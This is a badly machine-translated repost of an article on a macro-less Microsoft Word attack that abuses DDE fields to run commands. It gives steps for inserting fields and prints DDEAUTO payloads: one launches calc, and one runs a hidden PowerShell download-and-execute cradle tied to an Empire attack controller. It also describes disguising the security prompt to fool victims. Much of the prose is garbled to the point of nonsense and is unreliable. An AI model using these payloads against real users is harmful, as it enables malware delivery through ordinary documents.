Microsoft Office Word free macro command execution flaw vulnerability 0day-vulnerability warning-the black bar safety net

ID MYHACK58:62201789589
Type myhack58
Reporter 佚名
Modified 2017-10-12T00:00:00


If we inform you that in MS-Word on the presence of a Royal Decree to fulfill the vulnerability flaws of the bug, which unnecessary any macro maybe memory overflow?

Windows for use between the stop data transfer supply a variety of transmission methods, this one is called static swap agreements, we referred to it as the DDE agreement. DDE agreements it is a set of information with a pointing reference. It is in the sharing data of use of French between transmitting news, and the use of shared memory in the use of French between the stop data interchange. The use of French to be able to use the DDE agreement to stop the one-time data transmission and continuous interchange, the use of French in the new data can be lasted, the updates will be sent to each other. In our top of the document center, we use via the process of fulfilling a use of the operation of the DDE agreement, in order for us to supply a case presentation. In the previous post, let's review the debate in MS-Excel using DDE to get the order fulfilled, and in the use of this approach to bypass the macro filter mail the network security gateway and enterprise VBA strategy to obtain victory. DDE is not limited to Excel to use in Word also have the DDE effect, of course, for this 2 the efficacy of the able to get order to fulfil the road, has previously been proposed, what, then will we know, so far there is no one reality confirmed by this point. DDE and Office Etienne and I are examining some of the funny COM tools, particularly with MS-Office irrespective of the content, the most interesting is our invention COM way in to stop the DDE Initialization and DDE honour will be MS-Excel and MS-Word the exposed. Since MS-Excel to the We supply a Royal Decree to fulfill our resolution to embark on the invention journey, the official start to invent as in MSWord on the use of DDE and as security thereon to complete the order fulfillment. Through unremitting efforts, we will eventually get clear as in MS-Word using DDE the. First, let's in to increase the‘field’on the cessation of the manipulation, please follow the following pace stop operating.

Unplugged - document member - domain ! Choices =(Formula) ,then click Confirm ! After that you should see in the document to pull out a field, and show the error“! Very much the formula beginning”, right click on“this field”, then choice“toggle field code”. ! ! Field code in this case will behave inside us, in accordance with the above code content, and exchange tacit field region of code;

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" } DDEAUTO keywords will take care of MS-Word this is a DDE field, and will in the document close the active Self, the second Department Code content is divided into two sections, the first section content is to be fulfilled can be fulfilled file of the complete road, the second section between the quotation marks of the content is inform a fulfilling French(履行calc.exe in. ! Another approach is to use: CTRL+F9 indirect creation of an empty field identifier, and then indirectly pull out the top of the DDE test code. Then the document is reserved for disorders of Word documents“. docx”, and any mechanical shut it. ! The first positive report pop-UPS is to update the document link, and without any vicious thoughts content. ! A second reminder of the request whether the user necessary to fulfill the specified use of the French, so far we can think this is a network security alarm, only requesting the user to perform“cmd.exe”here we be able to via the process in response to the grammar changes after hidden it. ! When the victim clicks on this document,see...laughter(yinxiao...) ! This is also not the best, the most beautiful work is that we on this document stop network security monitoring, the invention actually did any of the independent macro-and perhaps the rest of the vicious thoughts of the network security alarm...,to be...haha...laughing three sound...the rest of everyone is itself the obscenity..... ! Shells In order to give everyone the show of a POC,let's for example a use of the Empire's invasion attack Controller demo video, keep up the surface of the strange in the stop to stop the network security scanning verification, we are given above of the Payload to.

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP-sta-NonI-W Hidden $e=(New-Object System. Net. The WebClient). DownloadString('');powershell-e $e "} Video demo: The document at the end We use“DDE”field identifier strange to be able to complete the identical consequences:

{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" } What, then, you need to. docx is stopped in response to the changes, to enable their active links update. To this end, 请在文档管理器中关上.docx并设置word/settings.xml and at the end in the above XML tag to pull out to the docPr element.

[1] [2] next